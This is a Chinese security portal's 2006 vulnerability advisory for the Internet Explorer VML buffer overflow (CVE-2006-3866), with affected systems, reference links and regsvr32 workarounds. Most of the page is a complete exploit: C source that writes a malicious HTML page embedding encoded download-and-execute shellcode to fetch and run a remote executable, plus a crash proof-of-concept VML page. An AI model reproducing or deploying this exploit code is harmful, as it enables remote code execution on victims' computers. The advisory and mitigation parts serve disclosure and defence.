中华网络安全联盟 收藏本站
设为主页
商务合作
首页 新闻中心 行业动态 软件新闻 安全资讯 病毒预警 漏洞发布 操作系统 Dos Win9x Win2000 WinXP Win2003 WinVista Linux Unix
数据库 DB2 Access MSSQL MySQL Oracle Sybase 编程技术 ASP PHP JSP CGI/Perl XML .Net C/C++/C# VB VC Delphi Java 汇编
安全技术 安全教学 工具介绍 漏洞利用 病毒防范 入侵检测 防火墙 安全防范 汉化破解 攻击实例 加密解密 进程知识 技术论坛
中华网络安全联盟 >> 新闻中心 >> 漏洞发布 >> Microsoft IE畸形VML文档处理缓冲区溢出漏洞
新闻中心
行业动态
软件新闻
安全资讯
病毒预警
漏洞发布
Microsoft PowerPoint
Microsoft IE COM对象
Microsoft Publisher字
Microsoft IE压缩内容
Microsoft索引服务查询
Microsoft PGM远程缓冲
ICQ Toolbar 1.3 for 
Microsoft Word 2000远
Microsoft IE畸形VML文档处理缓冲区溢出漏洞
字体:

中华网络安全联盟    来源:奇趣    时间:2006-9-20

发布日期:2006-09-19
更新日期:2006-09-20

受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4

描述:

BUGTRAQ  ID: 20096
CVE(CAN) ID: CVE-2006-3866

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer的VML组件存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。

VML(Vector Markup Language)是一种基于XML的矢量图形绘制语言。IE通过vgx.dll提供了对VML语言的支持,可以在解析页面中嵌入的VML,显示矢量图。 vgx.dll的_IE5_SHADETYPE_TEXT::Text过程在解析VML的时候存在缓冲区溢出漏洞,利用这个漏洞可以完全控制用户的系统。目前这个漏洞正在被积极的利用。

<*来源:Sunbelt Software (http://www.sunbelt-software.com/)
  
  链接:http://secunia.com/advisories/21989/
        http://www.microsoft.com/technet/security/advisory/925568.mspx
        http://marc.theaimsgroup.com/?l=bugtraq&m=115868614518870&w=2
        http://www.kb.cert.org/vuls/id/416092
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Search Shellcode
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);
}
}

void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

if (argc < 2)
{
printf("Windows VML Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
exit(1);
}

url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d
bytes.\n", MAXURL);
return;
}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}

fflush(fp);

// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;

memcpy(buf+psize, dcstart, 4);
psize += 4;

sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;


// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);

for(i=0; i<strlen(url)+1; i++)
{
burl[i] = buf[i] ^ 0xee;
}

memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;

memcpy(buf+psize, dcend, 4);
psize += 4;


// print NCR
convert2ncr(buf, psize);



printf("[+] buff size %d bytes\n", psize);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

printf("[+] exploit write to %s success!\n", file);
}

=============================================================================

<!--
Currently just a DoS

EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX

Shirkdog
-->

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body>


<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>

</body>
</html>

# milw0rm.com [2006-09-19]

建议:

临时解决方法:

* 解除vgx.dll的注册
  点击“开始”菜单,选择“运行”,在其中输入下面的命令:
  regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
  然后点击“确定”,在随后出现的弹出窗口中点击“确定”按钮。
  在微软发布补丁后,如果想恢复注册,只需再用上述方法运行下面的命令即可:
  regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
* 修改访问控制列表,限制用户对vgx.dll访问
* 配置Microsoft Windows XP SP2上的IE6在Internet和本地Intranet安全区中禁用“二进制和脚本行为”
* 以纯文本方式读取邮件消息

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp
字体:
 
设为主页 收藏本站 联系我们 友情连接 商务合作 网友留言
Copyright©2006-2008 中华网络安全联盟 All rights reserved.